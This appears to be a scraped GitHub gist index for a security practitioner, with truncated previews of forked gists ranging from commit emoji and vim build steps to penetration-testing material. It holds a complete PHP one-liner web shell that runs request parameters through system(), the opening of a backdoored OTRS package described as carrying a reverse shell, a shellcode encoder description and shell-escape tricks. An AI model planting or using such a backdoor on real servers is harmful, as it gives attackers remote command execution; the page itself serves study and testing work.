Kevin Kirsche kkirsche

kkirsche /
Last active Jun 17, 2021 — forked from parmentf/
Emoji for Conventional Commits
Type Emoji code
build 📦 :package:
chore 🔧 :wrench:
ci 👷 :construction_worker:
docs 📚 :books:
feat ✨ :sparkles:
fix 🐛 :bug:
perf 🚀 :rocket:
refactor 🔨 :hammer:
kkirsche /
Created Oct 2, 2018 — forked from mgeeky/
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's subtract arguments finding algorithm.
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output its ASCII encoded form.
# This payload will at the beginning align the stack by firstly moving
kkirsche / vim8.x_with_lua
Created Jul 28, 2018 — forked from techgaun/vim8.x_with_lua
Install vim with lua support on ubuntu 16.04
I needed to install vim with lua support because I wanted to use neocomplete in my recently installed 15.04 distro. Also, this has python3 enabled by default.
Tested on 16.04 now
Update: This has been tested and verified to work on Ubuntu 16.04 as well. Also, if you wish to use a particular branch/tag, you can get the version and then check it out appropriately.
The following (based upon should work though I copied it from history:
sudo apt-get remove --purge vim vim-runtime vim-gnome vim-tiny vim-common vim-gui-common
sudo apt-get build-dep vim-gnome
sudo apt-get install build-essential liblua5.3-0 liblua5.3-dev python-dev ruby-dev libperl-dev libncurses5-dev libgnome2-dev libgnomeui-dev libgtk2.0-dev libatk1.0-dev libbonoboui2-dev libcairo2-dev libx11-dev libxpm-dev libxt-dev
kkirsche / dumprequest.php
Created Mar 6, 2018 — forked from magnetikonline/dumprequest.php
PHP script to dump full HTTP request to file (method, HTTP headers and body).
class DumpHTTPRequestToFile {
public function execute($targetFile) {
$data = sprintf(
"%s %s %s\n\nHTTP headers:\n",

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Escalate
  5. Document it

Time yourself

View Simple-Backdoor-One-Liner.php
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
kkirsche / MyPackage.opm
Created Nov 15, 2017 — forked from mgeeky/MyPackage.opm
OTRS OPM backdoored Package with Reverse Shell
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
<Vendor>My Module</Vendor>
<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
<Description Lang="en">MyModule</Description>
kkirsche / tricks
Created Nov 10, 2017 — forked from sckalath/tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
kkirsche / go-ssh-reverse-tunnel.go
Created Oct 25, 2017 — forked from codref/go-ssh-reverse-tunnel.go
Go SSH reverse tunnel implementation (SSH -R)
Go implementation of an SSH reverse tunnel, the equivalent of the SSH command below:
ssh -R 8080: operatore@
which opens a tunnel between the two endpoints and permits exchanging information in this direction:
server:8080 -----> client:8080
kkirsche / add CA cert on
Created Aug 2, 2017 — forked from kekru/add CA cert on CentOS Debian
Add CA cert to local trust store on CentOS or Debian
  • Open a webpage that uses the CA with Firefox
  • Click the lock icon in the address bar -> show information -> show certificate
  • The certificate viewer will open
  • Click details and choose the certificate in the certificate chain that you want to import to CentOS
  • Click "Export..." and save it as a .crt file
  • Copy the .crt file to /etc/pki/ca-trust/source/anchors on your CentOS machine
  • Run update-ca-trust extract
  • Test it with wget